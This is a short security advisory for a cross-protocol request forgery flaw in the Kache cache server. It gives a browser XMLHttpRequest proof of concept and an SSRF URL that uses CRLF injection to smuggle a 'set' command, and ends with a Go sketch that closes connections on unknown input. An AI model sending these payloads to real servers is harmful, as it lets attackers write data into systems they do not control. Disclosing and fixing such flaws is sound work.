Kache Cross Protocol Request Forgery

Kache as of commit de2c39491625c3f087027be961a17191e85f6d30 suffers from a cross protocol request forgery vulnerability.


MD5 | 94810b65a0abff4e8aa4dbe67a50216b

# Title: Kache / CPRF
# Date: 03/01/2019
# Discovered by: @codexlynx
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (the project does not use version numbers for now)
# Category: go, resp, cprf

[1] CPRF (Cross Protocol Request Forgery)
-----------------------------------------
The Kache server does not close the connection when it receives unknown strings. This can allow a malicious actor to perform cross-protocol interactions.

- POC 1: Set a key over HTTP:

<script>
var x = new XMLHttpRequest();
x.open("POST", "http://<TARGET_ADDRESS>:<TARGET_PORT>");
x.send("set mykey myvalue\n");
</script>

- POC 2: Exploit this CPRF to set a key via SSRF + CRLF injection:

https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=http://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue
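
- Mitigation sketch: the missing behaviour described above, closing the connection on the first unknown string, as an added Go example (not Kache's code and not part of the original advisory). The inline "set"/"get" syntax, the names serve and errProtocol, and the sample host are assumptions made for illustration.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"io"
	"os"
	"strings"
)

// errProtocol tells the caller to close the connection immediately.
var errProtocol = errors.New("protocol violation: closing connection")

// serve handles one client using a simplified inline "set"/"get" syntax
// (an assumption; not Kache's real parser). It returns errProtocol on the
// first line that is not a known command, so nothing after it is executed.
func serve(r io.Reader, w io.Writer, store map[string]string) error {
	sc := bufio.NewScanner(r) // splits on \n and strips a trailing \r
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		switch {
		// Exact, case-sensitive match: an HTTP "GET /" must not pass as "get".
		case len(f) == 3 && f[0] == "set":
			store[f[1]] = f[2]
			fmt.Fprint(w, "+OK\r\n")
		case len(f) == 2 && f[0] == "get":
			fmt.Fprintf(w, "+%s\r\n", store[f[1]])
		default:
			// Covers HTTP request lines, headers and blank lines:
			// reply once, then stop reading from this client.
			fmt.Fprint(w, "-ERR unknown command, closing\r\n")
			return errProtocol
		}
	}
	return sc.Err()
}

func main() {
	// Constructed sample: the kind of bytes a browser sends for POC 1.
	req := "POST / HTTP/1.1\r\nHost: cache.example\r\n\r\nset mykey myvalue\n"
	store := map[string]string{}
	err := serve(strings.NewReader(req), os.Stdout, store)
	fmt.Println("error:", err, "| keys stored:", len(store))
}
```

The caller is expected to close the socket as soon as serve returns errProtocol, so the "set" line that follows the HTTP headers (POC 1) or the injected CRLF (POC 2) is never parsed.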
